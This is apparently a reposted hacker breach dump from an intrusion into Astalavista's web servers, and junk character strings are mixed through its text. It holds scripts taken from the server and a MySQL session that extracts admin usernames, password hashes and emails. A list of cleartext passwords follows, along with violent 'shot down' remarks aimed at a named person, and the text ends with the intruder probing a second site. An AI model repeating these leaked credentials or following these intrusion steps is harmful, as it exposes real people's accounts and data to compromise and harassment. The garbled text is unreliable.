            $comExploits[$x]['changelog'] = $date;* t3 ]- E4 G# M7 I2 l

, t' `) U; A/ U  K6 x        }) p- b! @, v# v# z& Q5 p: }) |
[snip]
' y6 T$ {1 D1 f/ k; e6 r    $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
. U- J8 H& P8 u) C<rss version=”2.0″>  @7 H0 t, n: ^6 D1 [
    <channel>
& c  R( \2 R1 Y6 J" l9 O; _- u6 E6 C        <title>ASTALAVISTA.com - Exploits</title>) i9 ?  v6 p, z. X. V
        <link>http://www.astalavista.com/exploits</link>7 J  V. s5 K/ l) N! E# b
        <description>All availably Exploits.</description>
3 `9 b, r) X! x# z6 w        <language>en-us</language>- X5 \' @* F* O5 k
        <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
& Q; O% n  G8 b  q- L3 g        <docs>http://blogs.law.harvard.edu/tech/rss</docs>9 n" W# l3 z1 ^3 b/ Z1 y8 k" e
        <generator>Astalavista.com</generator>% E# t# w$ l" Q" ~0 }/ @9 K
        <webMaster>info@astalavista.com</webMaster>’ . $items . ‘& F. e/ a/ G6 y0 [
    </channel>* Z: i, {  l% r7 d/ _$ ~" m
</rss>’;6 r+ I6 {5 g* m6 a% t8 e+ G
( h7 g' T& a; u+ o1 B0 Z& T+ a1 P6 f5 y
    if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
+ V& u; n; ^# [9 _- V# W. p        unlink (FULLPATH . ‘/feed/exploits.xml’);1 h4 k3 D2 x, Q
    }% {8 U' u% v) [! \
" Z. y( b" g) n) W$ l
    file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
5 |0 c$ a/ @. Q7 J$ ?0 [- O[snip]
& q; A2 v6 t2 a7 {# _$ ~- V# ?5 z+ [. r/ @  w) d  u
sh-3.2$ cat exploits.sh  |5 J( D. {/ _* n+ ]3 ~% y
#!/bin/sh, a2 W2 w8 m/ g, G) C
8 h3 r# X3 `+ l& O8 b; n) b
###########################################################
2 y0 x* o& W( a$ [, A% v#                                                         #7 s' s" F/ T7 \! P; R8 e
#   Title:        milw0rm exploits adder                  #" D! y6 a8 s* R3 J1 i1 e
#   Description:  Add all milw0rm exploits to the         #
9 o% i/ y4 f' \0 |( |#                 Astalavista.com database                #( D- n% Y2 _/ y/ S  e% {+ J
#                                                         #
1 {( a4 ]- C2 `#   Company:      Astalavista Group                       #" I$ P7 I$ u& U3 R# {& h4 K
#   Author:       Paulo M. Santos                         #! R, O. O" A+ F
#   E-Mail:       链接标记paulo.santos@astalavista.ch             #
& U3 S' d+ c7 a3 ~#                                                         ## l" t9 {2 q6 d+ n1 s2 J: R, t, j
###########################################################
& Z* ~% T8 E$ }; Q3 s' \3 A; A0 H) ^& h( T2 m+ ^3 q3 o
# path
8 a0 L" H/ b8 I7 uthis_path=/home/com/public_html/modifications/cronjobs
! g  n9 s4 z0 Q, h8 U& U6 c, k2 X6 x! b& K: }  I4 n
# change directory, K- M9 z0 D, x7 U
cd $this_path
( p0 N% T5 S9 N/ Y8 c7 F3 E3 C7 Wcd tmp/
- k+ n- R& ^' {0 R6 @4 {- U5 C+ D8 A9 w6 a* J
# delete files! X" n6 p# a$ h1 B- n  J8 @
rm -rf milw0rm.tar.* &
. V+ ?: G% |% V' ~& t7 G# Orm -rf milw0rm/ &
7 x% Y* {6 d9 M% O4 ]. A! W; ^3 s
# wget milw0rm paket
7 Q5 {5 [6 b% C; {+ U# ?wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
6 ^6 f0 g5 Q/ Q+ f, R- ^' E4 {9 N* q% ?1 B. D
# extract milw0rm paket' ~4 I" k  Q3 M6 }; g2 A. b
tar -xvf milw0rm.tar.bz2
+ l. s  k7 H& D
5 X6 U4 B/ k9 W+ o& A3 X, B" u# change owner" n: X  f+ B1 l
chown -R com .2 W; d* e& L" m8 n/ ^% O9 S5 [2 H
chgrp -R com .
' E  J3 H$ b5 i% f" n, r: b4 u( F
  M+ a+ W0 H, Y: {+ c# execute php script% I' |/ d" `& }; O  |1 R% D
cd $this_path1 M2 M/ R0 C( W' a
php -q exploits.php
- t8 ?5 V+ X4 v5 @+ l
0 ~4 i) @, ~  @3 s* L9 B# delete files
, L1 |5 I% l% h& Y. Q; B+ {rm -rf tmp/milw0rm.tar.*
- ]8 M7 \% S* u$ N# Crm -rf tmp/milw0rm/
$ \) f7 _( Y* R) V3 K6 ~  D
- L, B$ }" V9 [1 T2 z8 K7 Bsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
: d3 @- N) g* x2 @, v6 CPaulo M. Santos needs to be shot down.
7 k% Z2 A8 K9 t: G. d- h) y. \- K) R
mysql -u contrexxuser2 -p
  o# A; v( N2 m' T+ ]9 k( g7 b+ |Enter password:5 Y8 p* }" V5 S' U6 ^' w2 O
Welcome to the MySQL monitor.  Commands end with ; or \g.
- h- |8 `& l  P. dYour MySQL connection id is 261694
+ |1 V% Z% I% _- lServer version: 5.0.45-community-log MySQL Community Edition (GPL)
8 |2 W) N/ Y7 A  g# r9 F( U6 ]" f6 _# `/ T( L) _
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.. k! ^* p; ~- g

/ Y3 q& u& K. {2 mmysql> show databases;
6 s% G+ {$ M9 ?. Q+——————–+
: B, i: k, \7 A% e6 _/ u| Database           |
5 O2 S5 b$ k4 }  e# c/ }. K+——————–+$ f0 u0 p, D, @7 w6 y( r; X& d
| information_schema |
$ k6 ]2 S! R* _* }8 s/ \+ i, {| com_contrexx2      |& M1 w# B3 g7 w! L9 v! C
| com_contrexx2_live |
* {3 y1 y' [" e" x6 X| test               |9 ]2 U6 I  x* D9 }+ v9 G. {
+——————–+$ m) _( z; ^0 g5 ~" p7 e
4 rows in set (0.00 sec)
+ F& h+ d8 l5 b3 f# y2 K2 Z0 z- {7 G, n9 M% j" z4 d, J4 q7 l
mysql> use com_contrexx2_live/ b4 }: u; o9 M' Q; ]+ Q5 t0 l
Database changed: Y: J( ~; d6 I3 W" ~9 X& V% w) [0 K
mysql> show tables;
! c! g+ I* ~/ \+————————————————–+
' J0 K% j7 V: M7 m| Tables_in_com_contrexx2_live                     |+ j, w$ X- D( i* h) z
+————————————————–++ e, T' U% f4 F' P0 e" N% J. T% }- z
| cc_banner_counter                                |
$ G; y. Y8 _5 h3 C5 o| cc_search_counter                                |
; \/ D5 F5 x' B+ Z$ F| contrexx_access_group_dynamic_ids                |4 B1 ?' _% G" {  z2 Z9 R3 z
| contrexx_access_group_static_ids                 |: c2 I  B2 X/ M
| contrexx_access_rel_user_group                   |/ F* \6 ?- s/ P0 `" E9 I
| contrexx_access_settings                         |
9 D! U. d' G* S5 ?) ?| contrexx_access_user_attribute                   |6 _5 O" N* n5 d
| contrexx_access_user_attribute_name              |/ r. f8 m1 i6 T; M. U
| contrexx_access_user_attribute_value             |; l' x$ [: N1 U7 w# Y
| contrexx_access_user_core_attribute              |
! \! s: U- f2 b1 q! r- a| contrexx_access_user_groups                      |  C4 U7 x$ U% ~$ a  X- a: ?
| contrexx_access_user_mail                        |1 h- a. u, n8 V  m! }
| contrexx_access_user_profile                     |, e, g/ [6 P. {( H. W
| contrexx_access_user_title                       |4 o/ q! r- U; s
| contrexx_access_user_validity                    |- c7 j  |) m2 ^' M! `9 Y1 H
| contrexx_access_users                            |5 C  g+ o# i0 M8 P/ D
| contrexx_backend_areas                           |
" ?+ }% a. {* Q$ Q) h7 e| contrexx_backups                                 |
1 K/ g# X1 q! [2 J2 s8 l, @. R/ E# Q| contrexx_content                                 |
! v' v' a, i1 P% v; V/ ]/ K0 I| contrexx_content_history                         |0 p) Y$ ~& J0 O% l0 Q: x
| contrexx_content_logfile                         |
3 G) \" Y/ _- E& J- U! z( @+ U| contrexx_content_navigation                      |
* m1 \9 ^- l0 u/ |3 g2 D) T: |* K| contrexx_content_navigation_history              |
! I/ L* G* V2 j| contrexx_ids                                     |
$ t8 w" E% \: W| contrexx_languages                               |1 M' O' n: P; D, f- Z& D
| contrexx_lib_country                             |
) G9 B& F% d# y' h| contrexx_log                                     |
0 b, E; I6 \9 H3 M| contrexx_module_alias_source                     |- ?0 L" d% x- }* @& Y
| contrexx_module_alias_target                     |6 p" b" n) ]9 J6 h# |% B
| contrexx_module_block_blocks                     |
# r2 j, i5 c" b$ Q+ ^$ `| contrexx_module_block_rel_lang                   |
( m, g7 X5 }  Q* j| contrexx_module_block_rel_pages                  |
. r; Q" q  e2 ]: I" w2 J! x| contrexx_module_block_settings                   |. L7 t2 z! h. i: \. b8 U
| contrexx_module_blog_categories                  |
- M; |0 w1 Y3 S| contrexx_module_blog_comments                    |7 x+ F# @% F- {0 A" t
| contrexx_module_blog_message_to_category         |( B5 V1 D- B8 \4 f
| contrexx_module_blog_messages                    |& Q! ^8 u8 g2 v7 k5 f
| contrexx_module_blog_messages_lang               |
8 D" T' G4 W- n$ }8 k% B| contrexx_module_blog_networks                    |8 U* B" l: U* i+ v3 U8 F
| contrexx_module_blog_networks_lang               |
) E' M& Q+ T* y& |# f0 z) B# m! ?2 F| contrexx_module_blog_settings                    |( \3 J& h+ _- D
| contrexx_module_blog_votes                       |7 @4 I: k5 w& q  G2 M$ ~
| contrexx_module_calendar                         |0 @0 n: h" y/ J3 [  t
| contrexx_module_calendar_access                  |
7 b' b# P6 Z. d! J| contrexx_module_calendar_categories              |% T2 T2 L4 X7 @& a
| contrexx_module_calendar_form_data               |
/ e9 U9 d; b- V6 b$ E2 e. @| contrexx_module_calendar_form_fields             |( e! n# x3 A: T  d9 [
| contrexx_module_calendar_registrations           |3 X& F4 X8 ]9 H7 u5 `! a* y& ?9 S" S
| contrexx_module_calendar_settings                |+ F; c9 k. `( c
| contrexx_module_calendar_style                   |
+ g: j/ r: Q' o; ^| contrexx_module_contact_form                     |( I* n' T: j+ Z" s' u5 l
| contrexx_module_contact_form_data                |! [! s7 P" h1 V, }! E) A7 g. j3 o
| contrexx_module_contact_form_field               |: g  H( X9 L7 b2 ^9 Q
| contrexx_module_contact_settings                 |
3 C$ T. j6 b& v2 Y6 H4 K  K) w| contrexx_module_data_categories                  |7 k5 h. I3 g' m9 z5 g! m
| contrexx_module_data_message_to_category         |& }7 [& W* W3 S4 h; C, g
| contrexx_module_data_messages                    |
: W+ _- q8 M. g/ U7 P| contrexx_module_data_messages_lang               |5 b( ]* s$ Z; E& u! g* m* G4 ?
| contrexx_module_data_placeholders                |5 c. J% c: x% U- u8 G# s8 |
| contrexx_module_data_settings                    |4 q9 w0 n4 S$ G5 s; K0 D$ t& u1 u
| contrexx_module_directory_access                 |
! o/ B$ o4 ^8 l| contrexx_module_directory_categories             |
7 y- j  f7 J8 ~6 d* S( n! f, \| contrexx_module_directory_dir                    |
% X7 t/ c% P# ~! r* Y( A| contrexx_module_directory_inputfields            |
9 `" Z' F. y9 g0 ~. u  S! a3 m| contrexx_module_directory_levels                 |- c" @" `: Z( Q1 a/ S6 s2 G6 U' V" E" o
| contrexx_module_directory_mail                   |) C9 S+ I2 }. v- L) _% \
| contrexx_module_directory_rel_dir_cat            |: O3 v  a/ m4 o  s5 I
| contrexx_module_directory_rel_dir_level          |$ [. I2 L# Z, z6 |
| contrexx_module_directory_settings               |' c+ e$ r: r! b/ s! c  @( a
| contrexx_module_directory_settings_google        |
0 T/ v/ u9 M# |/ l$ ^| contrexx_module_directory_vote                   |5 W( }8 v& B8 @! w* f2 ?
| contrexx_module_docsys                           |8 Y& _1 u4 G' h5 y- n5 p
| contrexx_module_docsys_categories                |
5 C4 `' Z5 Y" Y* y# || contrexx_module_egov_configuration               |7 q8 V8 u5 G9 r9 j
| contrexx_module_egov_orders                      |
8 e/ V* ~, I1 G, U0 |8 p8 `| contrexx_module_egov_product_calendar            |
# }) E  S1 J0 m- O* ~5 Y| contrexx_module_egov_product_fields              |: e9 i% X1 O( O1 u/ P- y
| contrexx_module_egov_products                    |
5 u5 I$ `1 U  q% I+ \| contrexx_module_egov_settings                    |4 I) S) _0 M7 X( j' G* [
| contrexx_module_exploits                         |; T% {$ y9 f& B5 A. I4 q8 S/ p
| contrexx_module_exploits_categories              |) L9 \. B# X2 i- I3 @2 Z; Z: S
| contrexx_module_feed_category                    |. b) p* x/ h) Y; S  S
| contrexx_module_feed_news                        |
7 ^3 W: @8 I) j3 P| contrexx_module_feed_newsml_association          |4 Y" X: o* A) B
| contrexx_module_feed_newsml_categories           |0 q3 @' |9 c! B$ |# d
| contrexx_module_feed_newsml_documents            |
  j( I* I3 ^9 Q. n| contrexx_module_feed_newsml_providers            |
# s3 V, ~! _2 b# }$ d4 ^| contrexx_module_forum_access                     |/ g4 u4 }# |. R( a* L9 Q; q0 j$ x
| contrexx_module_forum_categories                 |! @5 b$ ^0 N; }& J( \7 q
| contrexx_module_forum_categories_lang            |6 d' x  M4 m$ D. Y
| contrexx_module_forum_notification               |
" ]! e2 A4 `& ]5 r/ `  p$ r| contrexx_module_forum_postings                   |, l9 w( Y( a8 O; c. X
| contrexx_module_forum_rating                     |
, |$ A# S9 D" }2 g+ x| contrexx_module_forum_settings                   |
$ ?1 K% p9 Y4 E7 E/ y| contrexx_module_forum_statistics                 |
* y+ |+ M. _) K3 _: x3 || contrexx_module_gallery_categories               |. a& d/ T+ H- G3 O7 h
| contrexx_module_gallery_comments                 |+ J; h( g/ R' a5 [5 ~* l! F- K
| contrexx_module_gallery_language                 |, |: k" i& B3 X. Q7 ~: J2 x
| contrexx_module_gallery_language_pics            |
, ~! l% G& I4 m& Z# `| contrexx_module_gallery_pictures                 |
/ ?  |# R, ?; b+ n) c| contrexx_module_gallery_settings                 |. h5 ^& c% U' D  w$ z; O
| contrexx_module_gallery_votes                    |
8 F3 W3 p" f* H9 T( B" h! S| contrexx_module_guestbook                        |
$ K* W) @% y7 x1 D6 A8 W| contrexx_module_guestbook_settings               |2 V8 d+ l2 \- M8 X! t
| contrexx_module_livecam                          |
/ Z& E7 l& E" j8 v' }1 r| contrexx_module_livecam_settings                 |. g- L- Y! Y- g6 X  h( T# w
| contrexx_module_market                           |, p8 d' y- x6 z" d
| contrexx_module_market_access                    |- x2 A. }- w2 f6 ~) R
| contrexx_module_market_categories                |0 c; i5 z1 s4 I) r3 Y+ I
| contrexx_module_market_mail                      |
- W; U. U% G& m, q* o" K1 Y| contrexx_module_market_paypal                    |
9 ?0 _3 d, J- |$ S% ^| contrexx_module_market_settings                  |' T- f% |" Q- K
| contrexx_module_market_spez_fields               |
* ^% {1 V. K& q| contrexx_module_mediadir_access                  |2 t! O& E2 Z0 t' t$ ?" c
| contrexx_module_mediadir_categories              |
$ N3 s& j" y* _| contrexx_module_mediadir_comments                |
% ~2 b, u4 {7 Q" t# @| contrexx_module_mediadir_dir                     |% G1 h5 k0 ~* _/ D: z) K+ g
| contrexx_module_mediadir_inputfields             |
& u+ t/ Q, u* o8 T, ~! W| contrexx_module_mediadir_levels                  |
% C7 S& b6 {% Q" X$ Q9 z| contrexx_module_mediadir_mail                    |
/ E: k. v' C5 ?% M| contrexx_module_mediadir_rel_dir_cat             |
) H/ Z) y6 M$ c' Z3 b" j6 l/ @0 [1 x* M# w| contrexx_module_mediadir_rel_dir_level           |
4 W7 h/ P1 ^& T| contrexx_module_mediadir_reports                 |8 ~9 z$ E* @3 k
| contrexx_module_mediadir_settings                |/ m7 N; l8 }5 H
| contrexx_module_mediadir_settings_google         |" j+ y9 e# C; c( I$ d: Z
| contrexx_module_mediadir_vote                    |
# m; }+ D' h9 ~% {1 L5 W& v| contrexx_module_memberdir_directories            |9 y$ G0 j6 ?& V, Q- M, P
| contrexx_module_memberdir_name                   |
4 `  L1 h/ @7 f. v| contrexx_module_memberdir_settings               |
5 b' [5 r5 P: [3 t0 L| contrexx_module_memberdir_values                 |
( i3 n+ n$ b8 p6 ?. g; C+ f+ Y| contrexx_module_nettools_allowed_groups          |
' B3 r0 H1 W  O6 Z| contrexx_module_nettools_settings                |# J% m  f# e8 n- g$ F3 ]* @
| contrexx_module_news                             |
# L/ h9 m7 ?3 l: q| contrexx_module_news_access                      |" j. }" S. ~7 M8 N
| contrexx_module_news_categories                  |
0 u8 g# H) l" |; L4 r| contrexx_module_news_settings                    |
" x6 L5 Z$ [( f! s8 |  p) \| contrexx_module_news_teaser_frame                |9 J# c. A6 D3 @! i2 J3 H4 C
| contrexx_module_news_teaser_frame_templates      |" B+ U2 W/ S5 \0 Y  G6 P" a% q; D
| contrexx_module_news_ticker                      |
. P, i" P5 d$ a9 [8 m' ]| contrexx_module_newsletter                       |( ^+ D' d6 h0 c! g  V
| contrexx_module_newsletter_attachment            |: A# ?4 v+ P) }4 S# i: }4 O9 p1 l4 M7 j% ^
| contrexx_module_newsletter_category              |& R) [% m; n" W% o) F1 L8 e
| contrexx_module_newsletter_confirm_mail          |# J# Q: u. s6 @
| contrexx_module_newsletter_rel_cat_news          |. o  D& E* j1 V) K3 G; q/ E  e# M8 Y- S
| contrexx_module_newsletter_rel_user_cat          |
+ C7 v0 N2 L* N4 a) {+ L- t| contrexx_module_newsletter_settings              |
9 ~+ R: ]( w( D+ V8 U: m# s5 V& |# _2 l| contrexx_module_newsletter_template              |7 {! G5 X$ @1 u' m& @' V, d
| contrexx_module_newsletter_tmp_sending           |
# w3 w" U$ \; d- ?) Q5 u! Y| contrexx_module_newsletter_user                  |" z5 b/ W% D4 ~, o& `
| contrexx_module_newsletter_user_title            |3 e5 G9 C9 f$ E  T. R. v# n
| contrexx_module_onlinetools_defaultports         |6 M+ c# ]! ?2 F# `) \3 W4 Q
| contrexx_module_onlinetools_defaultports_back    |
! Q& h0 B9 ~! l6 V9 W7 D| contrexx_module_onlinetools_geolitecity_blocks   |6 ^( t+ O3 J8 c7 _4 V
| contrexx_module_onlinetools_geolitecity_country  |
$ ^: f' W( r- ~3 N; M| contrexx_module_onlinetools_geolitecity_location |
1 N/ J1 l8 c, i9 H- E" H6 }| contrexx_module_podcast_category                 |) u6 b; f! g1 H+ F& O$ R; n4 i
| contrexx_module_podcast_medium                   |
, {& t; a; ~. d% x* I| contrexx_module_podcast_rel_category_lang        |9 @7 ~, e8 T9 L8 n) b+ [
| contrexx_module_podcast_rel_medium_category      |+ R) G- E9 E# g% G8 q- T/ z
| contrexx_module_podcast_settings                 |
7 `( I' e- b: `; _| contrexx_module_podcast_template                 |
7 e! P: }0 ^$ h, K( ^| contrexx_module_proxydb                          |
- O2 l; y+ X( l1 _4 W| contrexx_module_recommend                        |# W4 A" z2 d3 u+ u2 {7 r
| contrexx_module_repository                       |
& i) D( i: ^, [4 m+ q| contrexx_module_securitynews_cats                |
( l: l5 j# k0 f7 b! o) t| contrexx_module_securitynews_feeds               |, J/ Q# l& S, M0 X) g$ i/ [; M5 q
| contrexx_module_securitynews_news                |
0 T& I8 d0 r- ?| contrexx_module_shop_categories                  |/ g$ Z' o  ~8 i' W7 B6 B
| contrexx_module_shop_config                      |
/ w$ `7 y  e* [0 V2 k' S| contrexx_module_shop_countries                   |
6 q) W+ s( P* `! g| contrexx_module_shop_currencies                  |
  m: \4 `. v7 [; I) y& [| contrexx_module_shop_customers                   |/ @/ L3 [* j* n: p8 M, [( M
| contrexx_module_shop_importimg                   |) I* n6 Q$ v4 ~/ X& F
| contrexx_module_shop_lsv                         |
0 N8 T$ K$ m' A+ n6 W# L| contrexx_module_shop_mail                        |
9 w' d: _4 |+ M) k# \. G| contrexx_module_shop_mail_content                |
0 B$ ?% t4 ~" x. F2 Q( _| contrexx_module_shop_manufacturer                |( F$ G; e  D2 Z7 [, n) B) H
| contrexx_module_shop_order_items                 |
9 J7 k8 t0 c! v. E| contrexx_module_shop_order_items_attributes      |6 Z6 n, ^  V4 Z
| contrexx_module_shop_orders                      |
; k# S- P$ [8 \- U( b3 A| contrexx_module_shop_payment                     |+ q% y' W8 Q7 {! n+ G3 K( T) H! a
| contrexx_module_shop_payment_processors          |" x- M3 r3 P1 V) Z! j8 `  j% V# D
| contrexx_module_shop_pricelists                  |
0 a+ T1 _& z0 J* I5 R& e| contrexx_module_shop_products                    |# f7 d8 y; c. ?1 V+ J$ ^' _' W
| contrexx_module_shop_products_attributes         |" g; M# }& u' T( D6 `
| contrexx_module_shop_products_attributes_name    |
5 @0 t, d4 P1 d4 a| contrexx_module_shop_products_attributes_value   |
, g. S5 s% m6 Z1 U) n; v| contrexx_module_shop_products_downloads          |' Z; H  D7 J5 o0 B
| contrexx_module_shop_rel_countries               |5 B( U. S* L' T3 o7 P5 ^( @, |
| contrexx_module_shop_rel_payment                 |
+ i3 b6 u" O0 x2 J+ R| contrexx_module_shop_rel_shipment                |
* c# X9 q% j- k1 F+ j| contrexx_module_shop_shipment_cost               |
  z& Y. x. n$ r: f3 T| contrexx_module_shop_shipper                     |
# _6 B. q9 h+ P0 S7 U' h; H3 U| contrexx_module_shop_vat                         |" b) o9 S1 l4 y3 Y8 }& [) @) C
| contrexx_module_shop_zones                       |
# i$ q( @( k# h| contrexx_module_u2u_address_list                 |
3 A" y" t9 q  k8 ?3 q6 Y$ n+ S  d# W| contrexx_module_u2u_message_log                  |  x6 q* ^% N7 h6 y
| contrexx_module_u2u_sent_messages                |
8 c5 Q: J; c4 Y6 h  w1 ?| contrexx_module_u2u_settings                     |
+ ^( `: W( [8 H6 C  D/ \| contrexx_module_u2u_user_log                     |
. U1 G0 R4 X4 B- x- K7 x2 x" \| contrexx_modules                                 |
* j! e% o8 Y' e' c/ D+ U| contrexx_sessions                                |
& J# J$ W4 ?) n6 u7 G| contrexx_settings                                |* @1 g% M2 S/ ]+ C$ X! U
| contrexx_settings_smtp                           |
! x. }3 U% l* d# B| contrexx_skins                                   |, t4 v+ j' h6 [6 B# K5 ~0 D
| contrexx_stats_browser                           |# N5 n8 X7 G- G# ^- l- u* V
| contrexx_stats_colourdepth                       |$ J/ \, {! q0 b* ?8 }
| contrexx_stats_config                            |
7 R6 r! C3 [+ `( b$ E| contrexx_stats_country                           |
6 q! c* ]! |1 @1 r| contrexx_stats_hostname                          |
, [. d. k+ ~" ?* _/ f* O| contrexx_stats_javascript                        |; f6 u$ F, t5 X  ^* Q4 B( K$ E
| contrexx_stats_operatingsystem                   |
& F! T. `% @1 i( O( ?| contrexx_stats_referer                           |
9 F  A* n6 j0 ]0 z; w0 J8 c| contrexx_stats_requests                          |; D/ G, B6 f0 |. X( c
| contrexx_stats_requests_summary                  |
: z+ Y! P+ L- ^( D# t| contrexx_stats_screenresolution                  |
" ~2 v$ a! [" e. L8 w| contrexx_stats_search                            |  G1 f9 r! q% R' U
| contrexx_stats_spiders                           |- k" l9 n+ }" k# p: j' y
| contrexx_stats_spiders_summary                   |4 Z3 Q1 r3 m  U- \$ v; V2 b
| contrexx_stats_visitors                          |4 _& Q) I1 Y1 ^; g3 P
| contrexx_stats_visitors_summary                  |4 S+ V2 |" C" r1 T
| contrexx_voting_additionaldata                   |( O: b  l: C$ f
| contrexx_voting_email                            |
( Y7 Y% W: F7 e0 a! I$ e: L. M| contrexx_voting_rel_email_system                 |
/ x9 f# L& C' g& V. @$ L# j8 c% z| contrexx_voting_results                          |1 |, `; g$ {$ [; E0 m" s# Y3 N  ]
| contrexx_voting_system                           |* p) K% o& t) \6 s. a+ b
| foo                                              |
1 P1 Y$ j$ ~& [1 h4 T+————————————————–+
8 [- P, v2 ?, b7 G, J; p227 rows in set (0.01 sec)6 `; E2 b2 h1 R3 B) G, M
! ]: s' H- o0 Q  B: t5 a
mysql> select count(*) as skids from contrexx_access_users;
9 R4 a3 ?( d8 I, a' x6 O9 w" _# b+——-+
5 t" O" M& E0 x9 \+ \# [5 }| skids |
$ M: R+ X+ D+ O/ v& o+——-+
! a, z) Q% Q; S# V" @" x% ~| 53699 |
  a# M% z: d) I0 N% b% U+——-+$ J+ C, o! R% o8 I
1 row in set (0.00 sec)
# Z$ t$ L- @; z
8 N( N+ a- B4 c  J$ @: n3 pmysql> describe contrexx_access_users;
9 S2 F+ m" s9 A! W9 t! {( J+——————+——————————————+——+—–+————–+—————-+9 `5 [$ Y# k& Q& P/ T  u
| Field            | Type                                     | Null | Key | Default      | Extra          |
. V1 _* m- h' i& d8 f9 v: ?+——————+——————————————+——+—–+————–+—————-+- p8 Z5 @7 t; R7 R3 {
| id               | int(10) unsigned                         | NO   | PRI | NULL         | auto_increment |
: Z( R7 C/ m9 G$ P5 B, S| is_admin         | tinyint(1) unsigned                      | NO   |     | 0            |                |  L, ~/ n, Q9 b- ]3 ?6 g
| username         | varchar(40)                              | YES  | MUL | NULL         |                |# _) p+ e  K' V* U& Z
| password         | varchar(32)                              | YES  |     | NULL         |                |
2 {2 f+ W* S5 d( }| regdate          | int(14) unsigned                         | NO   |     | 0            |                |( r$ g- q$ w4 P+ C, _- F9 ?8 G8 R
| expiration       | int(14) unsigned                         | NO   |     | 0            |                |6 w) W6 p. L# t) J7 k% P* P
| validity         | int(10) unsigned                         | NO   |     | 0            |                |
1 v- e& g/ q8 p1 J! x, O1 h4 @& u/ y| last_auth        | int(14) unsigned                         | NO   |     | 0            |                |
6 j1 N! _3 \) T8 f4 ]3 v6 V% W$ E| last_activity    | int(14) unsigned                         | NO   |     | 0            |                |
& k% K) g4 b$ h% c% L| email            | varchar(255)                             | YES  |     | NULL         |                |
6 ~! X4 ]7 B6 ~| email_access     | enum(’everyone’,'members_only’,'nobody’) | NO   |     | nobody       |                |
% S( h) }0 R2 L| frontend_lang_id | int(2) unsigned                          | NO   |     | 0            |                |
% h% O# G: S0 |+ L/ ~( e8 Y| backend_lang_id  | int(2) unsigned                          | NO   |     | 0            |                |2 M7 p: P6 \1 o& g+ n' ~/ Y. L
| active           | tinyint(1)                               | NO   |     | 0            |                |
7 T: A% R: ]/ g% Z' a& k| profile_access   | enum(’everyone’,'members_only’,'nobody’) | NO   |     | members_only |                |
; r! h) B$ p+ O| restore_key      | varchar(32)                              | NO   |     |              |                |+ i7 E4 I! z$ A- l0 Y/ j
| restore_key_time | int(14) unsigned                         | NO   |     | 0            |                |3 J+ ?# r* T' U4 s, y
| u2u_active       | enum(’0′,’1′)                            | NO   |     | 1            |                |
5 e" V$ R! r# I. Z* F+——————+——————————————+——+—–+————–+—————-+1 M6 y" _/ W0 r. n" L
18 rows in set (0.00 sec)
  `  Z, U' v  w- G9 G  _
% X0 @1 Z0 n, q! s: Nmysql> select username,password,email from contrexx_access_users where is_admin = 1;: U0 Q  W9 q. S" Q" X; b" `
+————+———————————-+—————————–+! h5 K) ]& L9 k+ x
| username   | password                         | email                       |
* v) T" y% I& z) ^% A3 r+————+———————————-+—————————–+
' S' w0 L8 ^, n4 F3 W| system     | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com          |5 ~) q4 X. Z) }
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com      |
$ T  g  Q) f" j3 K| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
4 r. m3 w, n! X1 c1 q| schmid     | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com   |$ ?8 G; A: L( T7 C' ^
+————+———————————-+—————————–+
% G. S/ i# c+ K8 F4 rows in set (0.04 sec)
$ Q/ e% k) M3 p# f2 N2 P4 L( i- p8 n! i7 j" i
mysql> exit;+ P, v, e, e1 S# n) E
Bye
$ V& \/ E9 R" c* P8 q& P0 p, {  a  h8 S' h
[~] There you go, your “team of security and IT professionals” is a joke.
! M  k7 ?6 h+ K; v* m2 F9 ~4 W' U
+——————————+0 S/ U9 ?" t8 R- n
system:f82BN3+_*
6 _5 T# K: \/ zBe1er0ph0r:belerophor4astacom: x' c7 p) M) b, Z, i$ I# E
prozac:asta4cms!/ }" I/ N& B! u. \3 c
commander:mpbdaagf6m
7 e- f0 F9 y  L- e8 c' w# u4 rsykadul:ak29eral
$ }' E* n3 y7 J. X# P1 M9 L+——————————+. D+ e  V9 k+ |3 V8 m& W$ s
7 q# V8 m# w% j( B" z
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
0 N8 l5 H9 B; v6 b. \$ V…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.+ O4 V* L2 e- m* G

7 t" p$ |+ h; l! ^9 b[~] Lets move to astalavista.net now,! s  `' V* t8 Y9 }' D6 K

6 G4 J! ^$ }' qFrom <链接标记[url]https://www.astalavista.net/[/url]>:, X8 n4 c, B+ z# i  F
>> Everyone knows that the best defense is a good offense.' O( C# X, M1 [  c
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.% j" i, Z+ z2 m3 L) Z  j  c. _9 n
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.1 J# h4 Q; G0 _& q8 Y! j
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
$ A# _% k4 m( {
8 S3 t8 F; _+ a: S+ w>> Go ahead, try and hack our server . in a completely legal way!
- c8 q. Y2 O7 K# ?1 f>> Learn by doing: We offer our members tricky tasks and challenges on an
0 D+ ?7 ]* s0 `/ T+ z3 g>> ongoing basis so you can test your knowledge and abilities. You can also
2 }: E3 E* C6 Z7 }( k>> demonstrate what you.ve mastered by taking part in regular hacker contests4 l- d2 b6 y  Z( X, ^% Z
>> and war games; r+ Y' j) O% l# ~7 y5 ?

% ^2 s- S5 t- |2 Z[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
& G. E0 c" `9 B3 U* g6 G6 l! Q& s9 ?8 c# V+ l$ g
[-] Tricky task: Find home dir of astalavista.net
1 l/ k, n6 W3 U1 i8 J5 t$ j1 _
  @' ^, w7 }8 k) O; N7 ^: U. lsh-3.2$ ls -la ~astanet
